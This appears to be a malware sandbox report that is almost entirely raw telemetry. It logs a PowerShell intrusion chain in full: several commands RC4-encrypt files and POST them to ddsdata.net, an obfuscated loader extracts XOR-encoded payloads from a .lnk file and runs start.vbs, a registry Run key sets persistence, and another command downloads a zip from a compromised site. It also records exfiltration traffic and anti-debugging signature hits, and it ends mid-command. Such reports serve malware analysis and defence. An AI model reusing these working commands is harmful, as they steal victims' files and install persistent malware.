cmdline powershell -command "function ES113{param ([Parameter(Mandatory=$true)] [string]$src1205,[Parameter(Mandatory=$true)] [string]$Key);$srcbytes = [System.Text.Encoding]::UTF8.GetBytes($src1205); $kbytes12 = [System.Text.Encoding]::UTF8.GetBytes($Key);$s = New-Object byte[](256);$k = New-Object byte[](256);for ($i = 0; $i -lt 256; $i++) {$s[$i] = $i;$k[$i] = $kbytes12[$i % $kbytes12.Length];}$j = 0;for ($i = 0; $i -lt 256; $i++) {$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;}$encbytes12 = New-Object byte[] $srcbytes.Length;$i = 0;$j = 0;for ($n = 0; $n -lt $srcbytes.Length; $n++) {$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;$t = ($s[$i] + $s[$j]) % 256;$encbytes12[$n] = $srcbytes[$n] -bxor $s[$t];}$encstr12 = [System.Convert]::ToBase64String($encbytes12);return $encstr12;}$key=(Get-Date).Ticks.ToString();$tgurl12='http://ddsdata.net/upload.php';$fn='TEST22-PC_desk.txt';$fp='C:\Users\Public\Documents\desk.txt';$dt=gc -Path $fp -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$fn=ES113 -src1205 $fn -Key $key;$dt=ES113 -src1205 $dt -Key $key;$qry12 = [System.Web.HttpUtility]::ParseQueryString('');$qry12['fn']=$fn;$qry12['fd']=$dt;$qry12['r']=$key;$b=$qry12.ToString();$b12=[System.Text.Encoding]::UTF8.GetBytes($b);$wr12=[System.Net.WebRequest]::Create($tgurl12);$wr12.Method='POST';$wr12.ContentType='applic'+'ation/x'+'-ww'+'w-for'+'m-ur'+'lenco'+'ded';$wr12.ContentLength=$b12.Length;$rss12 = $wr12.GetRequestStream();$rss12.Write($b12,0,$b12.Length);$rss12.Close();$rsd12=$wr12.GetResponse();if($rsd12.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $fp;$fpok='C:\Users\Public\Documents\up'+'ok.t'+'xt';New-Item -ItemType File -Path $fpok;}"
cmdline powershell -command "function ES113{param ([Parameter(Mandatory=$true)] [string]$src1205,[Parameter(Mandatory=$true)] [string]$Key);$srcbytes = [System.Text.Encoding]::UTF8.GetBytes($src1205); $kbytes12 = [System.Text.Encoding]::UTF8.GetBytes($Key);$s = New-Object byte[](256);$k = New-Object byte[](256);for ($i = 0; $i -lt 256; $i++) {$s[$i] = $i;$k[$i] = $kbytes12[$i % $kbytes12.Length];}$j = 0;for ($i = 0; $i -lt 256; $i++) {$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;}$encbytes12 = New-Object byte[] $srcbytes.Length;$i = 0;$j = 0;for ($n = 0; $n -lt $srcbytes.Length; $n++) {$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;$t = ($s[$i] + $s[$j]) % 256;$encbytes12[$n] = $srcbytes[$n] -bxor $s[$t];}$encstr12 = [System.Convert]::ToBase64String($encbytes12);return $encstr12;}$key=(Get-Date).Ticks.ToString();$tgurl12='http://ddsdata.net/upload.php';$fn='TEST22-PC_sys.txt';$fp='C:\Users\Public\Documents\sys.txt';$dt=gc -Path $fp -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$fn=ES113 -src1205 $fn -Key $key;$dt=ES113 -src1205 $dt -Key $key;$qry12 = [System.Web.HttpUtility]::ParseQueryString('');$qry12['fn']=$fn;$qry12['fd']=$dt;$qry12['r']=$key;$b=$qry12.ToString();$b12=[System.Text.Encoding]::UTF8.GetBytes($b);$wr12=[System.Net.WebRequest]::Create($tgurl12);$wr12.Method='POST';$wr12.ContentType='applic'+'ation/x'+'-ww'+'w-for'+'m-ur'+'lenco'+'ded';$wr12.ContentLength=$b12.Length;$rss12 = $wr12.GetRequestStream();$rss12.Write($b12,0,$b12.Length);$rss12.Close();$rsd12=$wr12.GetResponse();if($rsd12.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $fp;$fpok='C:\Users\Public\Documents\up'+'ok.t'+'xt';New-Item -ItemType File -Path $fpok;}"
cmdline powershell -command "function ES113{param ([Parameter(Mandatory=$true)] [string]$src1205,[Parameter(Mandatory=$true)] [string]$Key);$srcbytes = [System.Text.Encoding]::UTF8.GetBytes($src1205); $kbytes12 = [System.Text.Encoding]::UTF8.GetBytes($Key);$s = New-Object byte[](256);$k = New-Object byte[](256);for ($i = 0; $i -lt 256; $i++) {$s[$i] = $i;$k[$i] = $kbytes12[$i % $kbytes12.Length];}$j = 0;for ($i = 0; $i -lt 256; $i++) {$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;}$encbytes12 = New-Object byte[] $srcbytes.Length;$i = 0;$j = 0;for ($n = 0; $n -lt $srcbytes.Length; $n++) {$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;$t = ($s[$i] + $s[$j]) % 256;$encbytes12[$n] = $srcbytes[$n] -bxor $s[$t];}$encstr12 = [System.Convert]::ToBase64String($encbytes12);return $encstr12;}$key=(Get-Date).Ticks.ToString();$tgurl12='http://ddsdata.net/upload.php';$fn='TEST22-PC_docu.txt';$fp='C:\Users\Public\Documents\docu.txt';$dt=gc -Path $fp -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$fn=ES113 -src1205 $fn -Key $key;$dt=ES113 -src1205 $dt -Key $key;$qry12 = [System.Web.HttpUtility]::ParseQueryString('');$qry12['fn']=$fn;$qry12['fd']=$dt;$qry12['r']=$key;$b=$qry12.ToString();$b12=[System.Text.Encoding]::UTF8.GetBytes($b);$wr12=[System.Net.WebRequest]::Create($tgurl12);$wr12.Method='POST';$wr12.ContentType='applic'+'ation/x'+'-ww'+'w-for'+'m-ur'+'lenco'+'ded';$wr12.ContentLength=$b12.Length;$rss12 = $wr12.GetRequestStream();$rss12.Write($b12,0,$b12.Length);$rss12.Close();$rsd12=$wr12.GetResponse();if($rsd12.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $fp;$fpok='C:\Users\Public\Documents\up'+'ok.t'+'xt';New-Item -ItemType File -Path $fpok;}"
cmdline powershell -windowstyle hidden function BYPVVObtSBg{param($vOiCAahtou,$YTMhzLrhzIPV,$ODtndleakm,$MqCNDxmeLr,$fNjGFHMrbWA);<#letch overnegligently transactinide#> $jpgrvGKusY=New-Object <#tornese ungospelized nondesignate#>System.IO.FileStream($vOiCAahtou,<#uncross traceless bonita#>[System.IO.FileMode]::Open,<#spasmotin aborigine panzootic#>[System.IO.FileAccess]::Read);<#wariangle aristolochiaceous fictioneering#> $jpgrvGKusY.Seek($YTMhzLrhzIPV,<#quipsomeness stercoral undeceptitious#>[System.IO.SeekOrigin]::Begin);<#marchantia oversoar duplicature#> $VJOInKKXMRvQ=New-Object <#limnobium benzoic reefed#>byte[] $ODtndleakm;<#refries syndeses vermifugous#> $jpgrvGKusY.Read($VJOInKKXMRvQ,<#nonexemption preinitiated untruced#>0,$ODtndleakm);<#hematocytozoon commensalistic congregationalism#> $jpgrvGKusY.Close();for($jqqJILuBGK=0;$jqqJILuBGK -lt $ODtndleakm;$jqqJILuBGK++){$VJOInKKXMRvQ[$jqqJILuBGK]=$VJOInKKXMRvQ[$jqqJILuBGK] -bxor $MqCNDxmeLr;}sc <#cavallas vapidness trabecule#> $fNjGFHMrbWA <#semirigorously harmoniphone oxalated#> $VJOInKKXMRvQ -Encoding <#irrefrangible rivalries dumontite#> Byte;};function hwqBULFNvJ{param($sBDFnkRezJN);<#rezbanyite orth gavelling#> $KzOQvdcXYdjO=Get-ChildItem <#enheritage dialogite gorgonizing#>-Path <#haemorrhagic aftershafted transplantar#> $sBDFnkRezJN -Recurse <#preestimating arrivistes perfectionator#>*.lnk <#unspillable thiobacteriales inverts#>| <#colliculate unwitch unmeekness#>where-object <#apophyeeal oculauditory dackered#>{$_.length <#cannonry resoluble diplocoria#>-eq 0x042D9905} <#reendow unvoyaging engrossed#>| Select-Object <#certifiers gelechiid azeotrope#>-ExpandProperty <#tabors lonhyn halavahs#>FullName; return <#busybodyism cabrito sweepier#> $KzOQvdcXYdjO;<#pueblos pimas lutheran#>};$bKACpSJxmuLd=Get-Location;$ofHLTkfBuY=hwqBULFNvJ <#muniments cryoconite cruets#>-sBDFnkRezJN <#excludability hemen assassinative#> $bKACpSJxmuLd;if($ofHLTkfBuY.length<#bebite cesspits backstops#> -eq 0){$ofHLTkfBuY=hwqBULFNvJ <#proceritic earned nondisturbing#> -sBDFnkRezJN $env:Temp;} $bKACpSJxmuLd=Split-Path <#disentrancement bomble dobule#> $ofHLTkfBuY;$lBLKeytyGN = $ofHLTkfBuY.substring(0,$ofHLTkfBuY.length-4) <#jumma nonsensualistic grade#>+ '';BYPVVObtSBg -vOiCAahtou <#homaxonic standbys gunbuilder#> $ofHLTkfBuY -YTMhzLrhzIPV <#counterbend elvan chihuahua#> 0x000022B4 -ODtndleakm 0x00004800 -MqCNDxmeLr <#cheselip centunculus hyperadipose#> 0x10 -fNjGFHMrbWA <#pseudangina reemerge minchah#> $lBLKeytyGN;&<#physis manipulated cauli#> $lBLKeytyGN;$jsdoulrAkk=$env:public <#acuter orphrey remastication#>+ '\' <#pest hazers jaspidean#>+<#anthryl koch seamy#> 'vOiCAa.cab';BYPVVObtSBg -vOiCAahtou <#seriating unrestrictedly huntsmen#> $ofHLTkfBuY -YTMhzLrhzIPV <#hyperendocrinia inconsequence flandowser#> 0x00006AB4 -ODtndleakm <#anilopyrin chondrodite dackers#> 0x00013AA1 -MqCNDxmeLr <#semirebelliousness concretions uncolonizing#> 0x20 -fNjGFHMrbWA <#wampuses perruche esotericist#> $jsdoulrAkk;Remove-Item -Path <#unveritable scuttlebutt printmaker#> $ofHLTkfBuY -Force;expand $jsdoulrAkk <#uncompliantly polemics tracheobronchitis#> -F:* <#autogenously dhyana yus#> ($env:public <#perorative influenced shader#>+<#cisjurane limericks unbeholden#> '\' <#subpenaing varitype sciuroid#>+<#broomrape uncoloredly glandlike#> 'documents');remove-item <#rimous zaptiahs cougher#> -path <#strumectomy hoecake etherish#> $jsdoulrAkk <#dwindlement periclasite pelargonidin#>-force;$NjVWyNaCkCJM=$env:public<#larcher rascalship slough#>+'\documents\start.vbs';&<#paradisea parser diapaused#> $NjVWyNaCkCJM;
cmdline powershell -command "function ES113{param ([Parameter(Mandatory=$true)] [string]$src1205,[Parameter(Mandatory=$true)] [string]$Key);$srcbytes = [System.Text.Encoding]::UTF8.GetBytes($src1205); $kbytes12 = [System.Text.Encoding]::UTF8.GetBytes($Key);$s = New-Object byte[](256);$k = New-Object byte[](256);for ($i = 0; $i -lt 256; $i++) {$s[$i] = $i;$k[$i] = $kbytes12[$i % $kbytes12.Length];}$j = 0;for ($i = 0; $i -lt 256; $i++) {$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;}$encbytes12 = New-Object byte[] $srcbytes.Length;$i = 0;$j = 0;for ($n = 0; $n -lt $srcbytes.Length; $n++) {$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;$t = ($s[$i] + $s[$j]) % 256;$encbytes12[$n] = $srcbytes[$n] -bxor $s[$t];}$encstr12 = [System.Convert]::ToBase64String($encbytes12);return $encstr12;}$key=(Get-Date).Ticks.ToString();$tgurl12='http://ddsdata.net/upload.php';$fn='TEST22-PC_down.txt';$fp='C:\Users\Public\Documents\down.txt';$dt=gc -Path $fp -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$fn=ES113 -src1205 $fn -Key $key;$dt=ES113 -src1205 $dt -Key $key;$qry12 = [System.Web.HttpUtility]::ParseQueryString('');$qry12['fn']=$fn;$qry12['fd']=$dt;$qry12['r']=$key;$b=$qry12.ToString();$b12=[System.Text.Encoding]::UTF8.GetBytes($b);$wr12=[System.Net.WebRequest]::Create($tgurl12);$wr12.Method='POST';$wr12.ContentType='applic'+'ation/x'+'-ww'+'w-for'+'m-ur'+'lenco'+'ded';$wr12.ContentLength=$b12.Length;$rss12 = $wr12.GetRequestStream();$rss12.Write($b12,0,$b12.Length);$rss12.Close();$rsd12=$wr12.GetResponse();if($rsd12.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $fp;$fpok='C:\Users\Public\Documents\up'+'ok.t'+'xt';New-Item -ItemType File -Path $fpok;}"
cmdline reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v svchostno2 /t REG_SZ /d "C:\Users\Public\Documents\start.vbs" /f
cmdline powershell -command "function ES113{param ([Parameter(Mandatory=$true)] [string]$src1205,[Parameter(Mandatory=$true)] [string]$Key);$srcBytes = [System.Text.Encoding]::UTF8.GetBytes($src1205); $keyBytes = [System.Text.Encoding]::UTF8.GetBytes($Key);$s = New-Object byte[](256);$k = New-Object byte[](256);for ($i = 0; $i -lt 256; $i++) {$s[$i] = $i;$k[$i] = $keyBytes[$i % $keyBytes.Length];}$j = 0;for ($i = 0; $i -lt 256; $i++) {$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;}$encBytes = New-Object byte[] $srcBytes.Length;$i = 0;$j = 0;for ($n = 0; $n -lt $srcBytes.Length; $n++) {$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;$t = ($s[$i] + $s[$j]) % 256;$encBytes[$n] = $srcBytes[$n] -bxor $s[$t];}$encString = [System.Convert]::ToBase64String($encBytes);return $encString;}$url1 = 'https://aufildeseaux.com/wp-admin/includes/main/read/get.php?pw=xlse&cm=ns0010';$outfile = 'C:\Users\Public\Documents\di3726.zip';Add-Type -AssemblyName 'System.Web'; $key=(Get-Date).Ticks.ToString(); $qryStr = $url1.Split('?')[1]; $encoded = ES113 -src1205 $qryStr -Key $key;$url1=$url1.Split('?')[0]+'?'+$key+'='+[System.Web.HttpUtility]::UrlEncode($encoded);iwr -Uri $url1 -OutFile $outfile;"
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2780
thread_handle: 0x00000084
process_identifier: 2776
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell -windowstyle hidden function BYPVVObtSBg{param($vOiCAahtou,$YTMhzLrhzIPV,$ODtndleakm,$MqCNDxmeLr,$fNjGFHMrbWA);<#letch overnegligently transactinide#> $jpgrvGKusY=New-Object <#tornese ungospelized nondesignate#>System.IO.FileStream($vOiCAahtou,<#uncross traceless bonita#>[System.IO.FileMode]::Open,<#spasmotin aborigine panzootic#>[System.IO.FileAccess]::Read);<#wariangle aristolochiaceous fictioneering#> $jpgrvGKusY.Seek($YTMhzLrhzIPV,<#quipsomeness stercoral undeceptitious#>[System.IO.SeekOrigin]::Begin);<#marchantia oversoar duplicature#> $VJOInKKXMRvQ=New-Object <#limnobium benzoic reefed#>byte[] $ODtndleakm;<#refries syndeses vermifugous#> $jpgrvGKusY.Read($VJOInKKXMRvQ,<#nonexemption preinitiated untruced#>0,$ODtndleakm);<#hematocytozoon commensalistic congregationalism#> $jpgrvGKusY.Close();for($jqqJILuBGK=0;$jqqJILuBGK -lt $ODtndleakm;$jqqJILuBGK++){$VJOInKKXMRvQ[$jqqJILuBGK]=$VJOInKKXMRvQ[$jqqJILuBGK] -bxor $MqCNDxmeLr;}sc <#cavallas vapidness trabecule#> $fNjGFHMrbWA <#semirigorously harmoniphone oxalated#> $VJOInKKXMRvQ -Encoding <#irrefrangible rivalries dumontite#> Byte;};function hwqBULFNvJ{param($sBDFnkRezJN);<#rezbanyite orth gavelling#> $KzOQvdcXYdjO=Get-ChildItem <#enheritage dialogite gorgonizing#>-Path <#haemorrhagic aftershafted transplantar#> $sBDFnkRezJN -Recurse <#preestimating arrivistes perfectionator#>*.lnk <#unspillable thiobacteriales inverts#>| <#colliculate unwitch unmeekness#>where-object <#apophyeeal oculauditory dackered#>{$_.length <#cannonry resoluble diplocoria#>-eq 0x042D9905} <#reendow unvoyaging engrossed#>| Select-Object <#certifiers gelechiid azeotrope#>-ExpandProperty <#tabors lonhyn halavahs#>FullName; return <#busybodyism cabrito sweepier#> $KzOQvdcXYdjO;<#pueblos pimas lutheran#>};$bKACpSJxmuLd=Get-Location;$ofHLTkfBuY=hwqBULFNvJ <#muniments cryoconite cruets#>-sBDFnkRezJN <#excludability hemen assassinative#> $bKACpSJxmuLd;if($ofHLTkfBuY.length<#bebite cesspits backstops#> -eq 0){$ofHLTkfBuY=hwqBULFNvJ <#proceritic earned nondisturbing#> -sBDFnkRezJN $env:Temp;} $bKACpSJxmuLd=Split-Path <#disentrancement bomble dobule#> $ofHLTkfBuY;$lBLKeytyGN = $ofHLTkfBuY.substring(0,$ofHLTkfBuY.length-4) <#jumma nonsensualistic grade#>+ '';BYPVVObtSBg -vOiCAahtou <#homaxonic standbys gunbuilder#> $ofHLTkfBuY -YTMhzLrhzIPV <#counterbend elvan chihuahua#> 0x000022B4 -ODtndleakm 0x00004800 -MqCNDxmeLr <#cheselip centunculus hyperadipose#> 0x10 -fNjGFHMrbWA <#pseudangina reemerge minchah#> $lBLKeytyGN;&<#physis manipulated cauli#> $lBLKeytyGN;$jsdoulrAkk=$env:public <#acuter orphrey remastication#>+ '\' <#pest hazers jaspidean#>+<#anthryl koch seamy#> 'vOiCAa.cab';BYPVVObtSBg -vOiCAahtou <#seriating unrestrictedly huntsmen#> $ofHLTkfBuY -YTMhzLrhzIPV <#hyperendocrinia inconsequence flandowser#> 0x00006AB4 -ODtndleakm <#anilopyrin chondrodite dackers#> 0x00013AA1 -MqCNDxmeLr <#semirebelliousness concretions uncolonizing#> 0x20 -fNjGFHMrbWA <#wampuses perruche esotericist#> $jsdoulrAkk;Remove-Item -Path <#unveritable scuttlebutt printmaker#> $ofHLTkfBuY -Force;expand $jsdoulrAkk <#uncompliantly polemics tracheobronchitis#> -F:* <#autogenously dhyana yus#> ($env:public <#perorative influenced shader#>+<#cisjurane limericks unbeholden#> '\' <#subpenaing varitype sciuroid#>+<#broomrape uncoloredly glandlike#> 'documents');remove-item <#rimous zaptiahs cougher#> -path <#strumectomy hoecake etherish#> $jsdoulrAkk <#dwindlement periclasite pelargonidin#>-force;$NjVWyNaCkCJM=$env:public<#larcher rascalship slough#>+'\documents\start.vbs';&<#paradisea parser diapaused#> $NjVWyNaCkCJM;
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received HTTP/1.1 100 Continue
Data received HTTP/1.1 200 OK Date: Thu, 14 Dec 2023 02:03:27 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Data received HTTP/1.1 200 OK Date: Thu, 14 Dec 2023 02:03:52 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Data received HTTP/1.1 200 OK Date: Thu, 14 Dec 2023 02:04:16 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Data sent POST /upload.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: ddsdata.net Content-Length: 52 Expect: 100-continue Connection: Keep-Alive
Data sent fn=CBdUhCvxQvW7LA0K392Vfxkr&fd=&r=638381593901250000
Data sent POST /upload.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: ddsdata.net Content-Length: 56 Expect: 100-continue Connection: Keep-Alive
Data sent fn=NKAQbx0E0dZnRN%2bu6p%2biobJr&fd=&r=638381594150468750
Data sent POST /upload.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: ddsdata.net Content-Length: 54 Expect: 100-continue Connection: Keep-Alive
Data sent fn=PEHmzPYu0MRcVeQIcxwNy4z%2f&fd=&r=638381594393593750
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Windows\system32\cmd.exe" /c p^owe^rshe^l^l -windowstyle hidden function BYPVVObtSBg{param($vOiCAahtou,$YTMhzLrhzIPV,$ODtndleakm,$MqCNDxmeLr,$fNjGFHMrbWA);^<#letch overnegligently transactinide#^> $jpgrvGKusY=New-Object ^<#tornese ungospelized nondesignate#^>System.IO.FileStream($vOiCAahtou,^<#uncross traceless bonita#^>[System.IO.FileMode]::Open,^<#spasmotin aborigine panzootic#^>[System.IO.FileAccess]::Read);^<#wariangle aristolochiaceous fictioneering#^> $jpgrvGKusY.Seek($YTMhzLrhzIPV,^<#quipsomeness stercoral undeceptitious#^>[System.IO.SeekOrigin]::Begin);^<#marchantia oversoar duplicature#^> $VJOInKKXMRvQ=New-Object ^<#limnobium benzoic reefed#^>byte[] $ODtndleakm;^<#refries syndeses vermifugous#^> $jpgrvGKusY.Read($VJOInKKXMRvQ,^<#nonexemption preinitiated untruced#^>0,$ODtndleakm);^<#hematocytozoon commensalistic congregationalism#^> $jpgrvGKusY.Close();for($jqqJILuBGK=0;$jqqJILuBGK -lt $ODtndleakm;$jqqJILuBGK++){$VJOInKKXMRvQ[$jqqJILuBGK]=$VJOInKKXMRvQ[$jqqJILuBGK] -bxor $MqCNDxmeLr;}sc ^<#cavallas vapidness trabecule#^> $fNjGFHMrbWA ^<#semirigorously harmoniphone oxalated#^> $VJOInKKXMRvQ -Encoding ^<#irrefrangible rivalries dumontite#^> Byte;};function hwqBULFNvJ{param($sBDFnkRezJN);^<#rezbanyite orth gavelling#^> $KzOQvdcXYdjO=Get-ChildItem ^<#enheritage dialogite gorgonizing#^>-Path ^<#haemorrhagic aftershafted transplantar#^> $sBDFnkRezJN -Recurse ^<#preestimating arrivistes perfectionator#^>*.lnk ^<#unspillable thiobacteriales inverts#^>^| ^<#colliculate unwitch unmeekness#^>where-object ^<#apophyeeal oculauditory dackered#^>{$_.length ^<#cannonry resoluble diplocoria#^>-eq 0x042D9905} ^<#reendow unvoyaging engrossed#^>^| Select-Object ^<#certifiers gelechiid azeotrope#^>-ExpandProperty ^<#tabors lonhyn halavahs#^>FullName; return ^<#busybodyism cabrito sweepier#^> $KzOQvdcXYdjO;^<#pueblos pimas lutheran#^>};$bKACpSJxmuLd=Get-Location;$ofHLTkfBuY=hwqBULFNvJ ^<#muniments cryoconite cruets#^>-sBDFnkRezJN ^<#excludability hemen assassinative#^> $bKACpSJxmuLd;if($ofHLTkfBuY.length^<#bebite cesspits backstops#^> -eq 0){$ofHLTkfBuY=hwqBULFNvJ ^<#proceritic earned nondisturbing#^> -sBDFnkRezJN $env:Temp;} $bKACpSJxmuLd=Split-Path ^<#disentrancement bomble dobule#^> $ofHLTkfBuY;$lBLKeytyGN = $ofHLTkfBuY.substring(0,$ofHLTkfBuY.length-4) ^<#jumma nonsensualistic grade#^>+ '';BYPVVObtSBg -vOiCAahtou ^<#homaxonic standbys gunbuilder#^> $ofHLTkfBuY -YTMhzLrhzIPV ^<#counterbend elvan chihuahua#^> 0x000022B4 -ODtndleakm 0x00004800 -MqCNDxmeLr ^<#cheselip centunculus hyperadipose#^> 0x10 -fNjGFHMrbWA ^<#pseudangina reemerge minchah#^> $lBLKeytyGN;^&^<#physis manipulated cauli#^> $lBLKeytyGN;$jsdoulrAkk=$env:public ^<#acuter orphrey remastication#^>+ '\' ^<#pest hazers jaspidean#^>+^<#anthryl koch seamy#^> 'vOiCAa.cab';BYPVVObtSBg -vOiCAahtou ^<#seriating unrestrictedly huntsmen#^> $ofHLTkfBuY -YTMhzLrhzIPV ^<#hyperendocrinia inconsequence flandowser#^> 0x00006AB4 -ODtndleakm ^<#anilopyrin chondrodite dackers#^> 0x00013AA1 -MqCNDxmeLr ^<#semirebelliousness concretions uncolonizing#^> 0x20 -fNjGFHMrbWA ^<#wampuses perruche esotericist#^> $jsdoulrAkk;Remove-Item -Path ^<#unveritable scuttlebutt printmaker#^> $ofHLTkfBuY -Force;expand $jsdoulrAkk ^<#uncompliantly polemics tracheobronchitis#^> -F:* ^<#autogenously dhyana yus#^> ($env:public ^<#perorative influenced shader#^>+^<#cisjurane limericks unbeholden#^> '\' ^<#subpenaing varitype sciuroid#^>+^<#broomrape uncoloredly glandlike#^> 'documents');remove-item ^<#rimous zaptiahs cougher#^> -path ^<#strumectomy hoecake etherish#^> $jsdoulrAkk ^<#dwindlement periclasite pelargonidin#^>-force;$NjVWyNaCkCJM=$env:public^<#larcher rascalship slough#^>+'\documents\start.vbs';^&^<#paradisea parser diapaused#^> $NjVWyNaCkCJM;
cmdline powershell -windowstyle hidden function BYPVVObtSBg{param($vOiCAahtou,$YTMhzLrhzIPV,$ODtndleakm,$MqCNDxmeLr,$fNjGFHMrbWA);<#letch overnegligently transactinide#> $jpgrvGKusY=New-Object <#tornese ungospelized nondesignate#>System.IO.FileStream($vOiCAahtou,<#uncross traceless bonita#>[System.IO.FileMode]::Open,<#spasmotin aborigine panzootic#>[System.IO.FileAccess]::Read);<#wariangle aristolochiaceous fictioneering#> $jpgrvGKusY.Seek($YTMhzLrhzIPV,<#quipsomeness stercoral undeceptitious#>[System.IO.SeekOrigin]::Begin);<#marchantia oversoar duplicature#> $VJOInKKXMRvQ=New-Object <#limnobium benzoic reefed#>byte[] $ODtndleakm;<#refries syndeses vermifugous#> $jpgrvGKusY.Read($VJOInKKXMRvQ,<#nonexemption preinitiated untruced#>0,$ODtndleakm);<#hematocytozoon commensalistic congregationalism#> $jpgrvGKusY.Close();for($jqqJILuBGK=0;$jqqJILuBGK -lt $ODtndleakm;$jqqJILuBGK++){$VJOInKKXMRvQ[$jqqJILuBGK]=$VJOInKKXMRvQ[$jqqJILuBGK] -bxor $MqCNDxmeLr;}sc <#cavallas vapidness trabecule#> $fNjGFHMrbWA <#semirigorously harmoniphone oxalated#> $VJOInKKXMRvQ -Encoding <#irrefrangible rivalries dumontite#> Byte;};function hwqBULFNvJ{param($sBDFnkRezJN);<#rezbanyite orth gavelling#> $KzOQvdcXYdjO=Get-ChildItem <#enheritage dialogite gorgonizing#>-Path <#haemorrhagic aftershafted transplantar#> $sBDFnkRezJN -Recurse <#preestimating arrivistes perfectionator#>*.lnk <#unspillable thiobacteriales inverts#>| <#colliculate unwitch unmeekness#>where-object <#apophyeeal oculauditory dackered#>{$_.length <#cannonry resoluble diplocoria#>-eq 0x042D9905} <#reendow unvoyaging engrossed#>| Select-Object <#certifiers gelechiid azeotrope#>-ExpandProperty <#tabors lonhyn halavahs#>FullName; return <#busybodyism cabrito sweepier#> $KzOQvdcXYdjO;<#pueblos pimas lutheran#>};$bKACpSJxmuLd=Get-Location;$ofHLTkfBuY=hwqBULFNvJ <#muniments cryoconite cruets#>-sBDFnkRezJN <#excludability hemen assassinative#> $bKACpSJxmuLd;if($ofHLTkfBuY.length<#bebite cesspits backstops#> -eq 0){$ofHLTkfBuY=hwqBULFNvJ <#proceritic earned nondisturbing#> -sBDFnkRezJN $env:Temp;} $bKACpSJxmuLd=Split-Path <#disentrancement bomble dobule#> $ofHLTkfBuY;$lBLKeytyGN = $ofHLTkfBuY.substring(0,$ofHLTkfBuY.length-4) <#jumma nonsensualistic grade#>+ '';BYPVVObtSBg -vOiCAahtou <#homaxonic standbys gunbuilder#> $ofHLTkfBuY -YTMhzLrhzIPV <#counterbend elvan chihuahua#> 0x000022B4 -ODtndleakm 0x00004800 -MqCNDxmeLr <#cheselip centunculus hyperadipose#> 0x10 -fNjGFHMrbWA <#pseudangina reemerge minchah#> $lBLKeytyGN;&<#physis manipulated cauli#> $lBLKeytyGN;$jsdoulrAkk=$env:public <#acuter orphrey remastication#>+ '\' <#pest hazers jaspidean#>+<#anthryl koch seamy#> 'vOiCAa.cab';BYPVVObtSBg -vOiCAahtou <#seriating unrestrictedly huntsmen#> $ofHLTkfBuY -YTMhzLrhzIPV <#hyperendocrinia inconsequence flandowser#> 0x00006AB4 -ODtndleakm <#anilopyrin chondrodite dackers#> 0x00013AA1 -MqCNDxmeLr <#semirebelliousness concretions uncolonizing#> 0x20 -fNjGFHMrbWA <#wampuses perruche esotericist#> $jsdoulrAkk;Remove-Item -Path <#unveritable scuttlebutt printmaker#> $ofHLTkfBuY -Force;expand $jsdoulrAkk <#uncompliantly polemics tracheobronchitis#> -F:* <#autogenously dhyana yus#> ($env:public <#perorative influenced shader#>+<#cisjurane limericks unbeholden#> '\' <#subpenaing varitype 